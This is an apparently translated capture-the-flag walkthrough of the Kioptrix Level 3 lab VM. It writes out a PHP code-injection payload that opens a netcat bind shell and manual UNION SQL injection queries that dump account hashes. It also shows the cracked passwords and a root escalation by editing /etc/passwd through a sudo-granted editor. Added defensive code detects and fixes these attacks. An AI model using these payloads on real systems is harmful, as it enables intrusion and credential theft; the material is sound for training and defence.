Target: 192.168.1.13
First, scan the target with nmap: nmap -sT -A -P0 192.168.1.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
....
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Only ports 22 and 80 are open.
Scanning with Nessus finds no exploitable system vulnerabilities. Since port 80 is open, try the web application instead: open it in a browser:
View the page source:
The site can be identified as LotusCMS, so search the Internet for vulnerabilities in that CMS.
This gives idea 1: exploit a known LotusCMS vulnerability. Continue browsing the site and click the Login option,
then try login bypasses and weak passwords. Failed...
Continuing to browse and analyze the site leads to this directory: http://192.168.1.13/gallery/.
Viewing the source of this page gives several leads:
(1)
Note the second line: <meta http-equiv="Generator" content="Gallarific"/>. What is Gallarific? Search online:
sure enough, it has exploitable vulnerabilities. This is the second approach: exploit Gallarific.
(2)
Notice the commented-out line <!-- <a href="gadmin">Admin</a>&nbsp; -->. "gadmin" looks like the link to the admin backend. Try http://192.168.1.13/gallery/gadmin/; sure enough, it is.
Try login bypasses and weak passwords again. Failed...
Further browsing and analysis of the site found nothing more useful, so I finally ran the site through WVS, which did not disappoint me: it found code injection vulnerabilities in several places. This is the third idea: exploit the code injection vulnerability for penetration.
Based on the above analysis, the penetration ideas are summarized as follows:
Idea 1: Use a known LotusCMS vulnerability for penetration.
Idea 2: Use the code injection vulnerability for penetration.
Idea 3: Use the Gallarific vulnerability for penetration.
Next, try the three ideas one by one:
Idea 1: There is very little information on the Internet, so this one is given up for now...
Idea 2: Use the code injection vulnerability for penetration.
http://192.168.1.13/index.php?page=${@print(system(%22ls%22))} returns:
Arbitrary code can be executed, so have the remote host listen on a port and then connect to it from the local machine:
http://192.168.1.13/index.php?page=${@print(system("/bin/nc+-l+-p+5555+-e+/bin/bash"))}, then connect from the local side (the path of nc can be found by running find / -name nc).
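From the defender's side, the requests above leave a distinctive trace in the web server's access log. The following is an added example, not part of the original writeup: a small log scanner that URL-decodes the query string of each Apache combined-format line and flags the PHP code-injection markers used here (${...}, @print(, system(). It also generalizes to the SQL injection probes used later on the page (ORDER BY column-count probing, UNION SELECT, information_schema/group_concat enumeration). The log lines are constructed for the example; the rule names are my own.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format log lines (not captured from the page's target).
# Line 2 carries the ${@print(system(...))} code-injection payload from the writeup,
# lines 3 and 4 the column-count probe and UNION query used against gallery.php.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?page=index HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2024:10:00:07 +0000] "GET /index.php?page=${@print(system(%22ls%22))} HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2024:10:00:19 +0000] "GET /gallery.php?id=1%20order%20by%207 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2024:10:00:25 +0000] "GET /gallery.php?id=1%20and%201=2%20union%20select%201,2,3,4,5,6 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2024:10:01:02 +0000] "GET /gallery.php?id=12 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Request part of the combined log format: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded query string.
RULES = [
    # PHP code injection: ${...} evaluation plus the usual execution functions.
    ("php-code-injection", re.compile(r"\$\{|@?print\s*\(|\b(system|passthru|shell_exec|exec)\s*\(", re.I)),
    # UNION-based SQL injection.
    ("sqli-union", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    # Schema enumeration through information_schema / group_concat.
    ("sqli-schema-enum", re.compile(r"information_schema|group_concat\s*\(", re.I)),
    # ORDER BY n column-count probing.
    ("sqli-column-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
]


def scan_log(text):
    """Return one finding per log line whose decoded query string matches a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        parts = urlsplit(m.group("path"))
        decoded = unquote_plus(parts.query)  # %22 -> ", %20 and + -> space
        hits = [name for name, rx in RULES if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "path": parts.path,
                "status": int(m.group("status")),
                "rules": hits,
                "query": decoded,
            })
    return findings


def offenders(findings):
    """Count flagged requests per client IP, most active first."""
    return Counter(f["ip"] for f in findings).most_common()


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['path']} {f['status']} {','.join(f['rules'])}  {f['query']}")
    print(offenders(found))
```

Decoding before matching matters: the payloads on this page arrive with %22, %20 and + encoding, so rules run on the raw log line would miss them. The 500 on the ORDER BY probe is itself a useful signal, since a column-count error that reaches the client is what makes the later UNION query possible.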
It can be seen that this is not root, and I then tried many local privilege escalation exploits (if anyone has working local privilege escalation code, I hope you will share it with me, thank you). Let's put this idea aside for the moment and try idea 3.
Idea 3: Use the Gallarific vulnerability for penetration.
Search for Gallarific vulnerabilities on exploit-db:
There is an SQL injection vulnerability, described as follows:
Injection point: www.site.com/gallery.php?id=null
So try the corresponding link: http://192.168.1.13/gallery.php?id=1. It is injectable and could simply be handed to sqlmap for convenience, but to get a better understanding of SQL injection no tools are used here, so ....
Guess the number of fields:
http://192.168.1.13/gallery.php?id=1 order by 6 (normal)
http://192.168.1.13/gallery.php?id=1 order by 7 (error), so the number of fields is 6
Find which fields are displayed:
http://192.168.1.13/gallery.php?id=1 and 1=2 union select 1,2,3,4,5,6 returns
It can be seen that field 3 is displayed and can be used ....
List the table names:
http://youip/gallery.php?id=1 and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6
The returned result is as follows:
dev_accounts, gallarific_comments, gallarific_galleries, gallarific_photos, gallarific_settings, gallarific_stats, gallarific_users
Note the two tables dev_accounts and gallarific_users, which can be guessed to be the account and user information tables. Since SSH is enabled, first dump the contents of dev_accounts and try to log in over SSH with them.
List all column names of dev_accounts:
http://youip/gallery.php?id=1 and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='dev_accounts'),4,5,6
The returned result is as follows:
Dump the username and password columns:
http://youip/gallery.php?id=1 and 1=2 union select 1,2,(select group_concat(username,0x3A,password) from dev_accounts),4,5,6
The returned result is as follows:
There are two users in total:
dreg 0d3eccfb887aabd50f243b3f155c0f85
loneferret 5badcaf789d3d1d09794d8f021f40f0e
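The root cause of everything from the ORDER BY probe to the dev_accounts dump is one pattern: the id parameter is pasted into the SQL text. The following added example (not Gallarific's code; a constructed in-memory SQLite model of the six-column gallery query and a dev_accounts table with placeholder names and hashes) shows the vulnerable handler beside its parameterized fix. The page's third-column payload is replayed against both; MySQL's 0x3A separator is rewritten as SQLite string concatenation, and the table/column names other than dev_accounts are assumptions.

```python
import sqlite3

# Constructed in-memory schema modelled on the six-column gallery query and the
# dev_accounts table named in the writeup; names and hashes are placeholders.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gallarific_photos (
            id INTEGER, title TEXT, description TEXT, filename TEXT, views INTEGER, owner INTEGER
        );
        CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
        INSERT INTO gallarific_photos VALUES (1, 'Office', 'Front desk', 'office.jpg', 3, 1);
        INSERT INTO gallarific_photos VALUES (2, 'Lobby', 'Ground floor', 'lobby.jpg', 8, 1);
        INSERT INTO dev_accounts VALUES (1, 'alice', 'HASH_PLACEHOLDER_1');
        INSERT INTO dev_accounts VALUES (2, 'bob', 'HASH_PLACEHOLDER_2');
    """)
    return db


COLUMNS = "id, title, description, filename, views, owner"


def photo_vulnerable(db, photo_id):
    """The bug: the request parameter is pasted into the SQL text, so whatever
    follows the number is parsed as SQL, which is how gallery.php?id=... behaved."""
    sql = f"SELECT {COLUMNS} FROM gallarific_photos WHERE id={photo_id}"
    return db.execute(sql).fetchall()


def photo_safe(db, photo_id):
    """The fix: validate the type, then bind the value as a parameter so the
    database engine never interprets it as SQL."""
    if not str(photo_id).isdigit():
        return []  # a real handler would answer 400 Bad Request here
    sql = f"SELECT {COLUMNS} FROM gallarific_photos WHERE id=?"
    return db.execute(sql, (int(photo_id),)).fetchall()


# The page's third-column exfiltration payload, with MySQL's 0x3A separator
# rewritten as SQLite string concatenation.
UNION_PAYLOAD = ("1 and 1=2 union select 1,2,"
                 "(select group_concat(username||':'||password) from dev_accounts),4,5,6")

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, id=1       :", photo_vulnerable(db, "1"))
    print("vulnerable, payload    :", photo_vulnerable(db, UNION_PAYLOAD))
    print("parameterized, id=1    :", photo_safe(db, "1"))
    print("parameterized, payload :", photo_safe(db, UNION_PAYLOAD))
```

With the bound parameter the whole payload string is compared against the integer column and matches nothing; the isdigit check on top is defense in depth and gives the application a clean place to reject the request. A database account that only has SELECT on the gallery tables (rather than on dev_accounts and information_schema) would also have limited what the page's queries could reach.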
I submitted them to an online cracking service, and I was lucky: both were cracked successfully:
dreg 0d3eccfb887aabd50f243b3f155c0f85 -- Mast3r
loneferret 5badcaf789d3d1d09794d8f021f40f0e -- starwars
Try logging in over SSH; it succeeds.
ls:
Note the file CompanyPolicy.README.
It suggests that ht is an editor. Try sudo ht:
Press F3 to open the file /etc/passwd (or /etc/sudoers), edit the loneferret line to change 1000 and 100 to 0 respectively, then press Ctrl+W to save.
Log in over SSH again and run id and whoami: we now have root privileges.
Note: if you open /etc/sudoers instead, change the line
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
to loneferret ALL=(ALL) ALL # NOPASSWD: !/usr/bin/su, /usr/local/bin/ht.
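The privilege escalation works because a sudo rule grants an editor, and an editor run as root can rewrite /etc/passwd or /etc/sudoers. Both the misconfiguration and its result are easy to audit. The following added example (my own, not part of the writeup) parses constructed samples of the two files: it flags sudo rules that grant ALL or a file-writing program (with or without NOPASSWD), and it lists passwd entries other than root that carry uid or gid 0, which is exactly the state the edit above leaves behind. The list of editor names is an assumption to extend for your own environment.

```python
import os
import re

# Constructed samples in the layout of the two files the writeup edits through
# "sudo ht"; the loneferret passwd line shows the post-edit state (uid/gid 0).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:0:0:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:dreg,,,:/home/dreg:/bin/bash
"""

SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL) ALL
# allow loneferret to run the ht editor without a password
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
%admin ALL=(ALL) ALL
"""

# Programs that open and save arbitrary files (assumed list): a sudo grant on any of
# them is equivalent to a grant of root, because /etc/passwd or /etc/sudoers can be edited.
FILE_EDITORS = {"ht", "vi", "vim", "nano", "ed", "emacs", "tee", "cp", "dd"}


def find_extra_superusers(passwd_text):
    """Accounts other than root whose uid or gid is 0 (the change made via sudo ht)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # blank or malformed line
        name, uid, gid = fields[0], fields[2], fields[3]
        if name != "root" and "0" in (uid, gid):
            found.append((name, int(uid), int(gid)))
    return found


# user host=(runas) [TAG:] command, command, ...
SUDO_RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"\b(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:")


def audit_sudoers(sudoers_text):
    """Flag sudo rules that grant ALL or a file editor, noting NOPASSWD grants."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SUDO_RULE_RE.match(line)
        if not m or m.group("who") == "root":
            continue  # root's own rule is expected
        cmds = m.group("cmds")
        suffix = " without a password" if re.search(r"\bNOPASSWD\s*:", cmds) else ""
        for cmd in TAG_RE.sub("", cmds).split(","):
            cmd = cmd.strip()
            if not cmd or cmd.startswith("!"):
                continue  # '!' entries deny; they grant nothing
            prog = os.path.basename(cmd.split()[0])
            if prog == "ALL":
                findings.append((m.group("who"), cmd, "any command as root" + suffix))
            elif prog in FILE_EDITORS:
                findings.append((m.group("who"), cmd,
                                 f"{prog} can rewrite /etc/passwd or /etc/sudoers" + suffix))
    return findings


if __name__ == "__main__":
    for entry in find_extra_superusers(SAMPLE_PASSWD):
        print("extra uid/gid 0 account:", entry)
    for who, cmd, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"sudo rule for {who}: {cmd} -> {why}")
```

The %admin group rule is reported too: a blanket ALL is the intended grant for administrators, but the audit should still surface it so that group membership is reviewed. Denial entries such as !/usr/bin/su are skipped because they add no capability; the rule that matters is the positive grant next to them.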
At this point the Kioptrix Level 3 penetration is complete, and I learned a lot. O(∩_∩)O~
Note: this is the first time I have written an article like this; I hope you will correct me and offer guidance. Thank you.
E-mail: felixk3y # qq.com Weibo: http://t.qq.com/root-security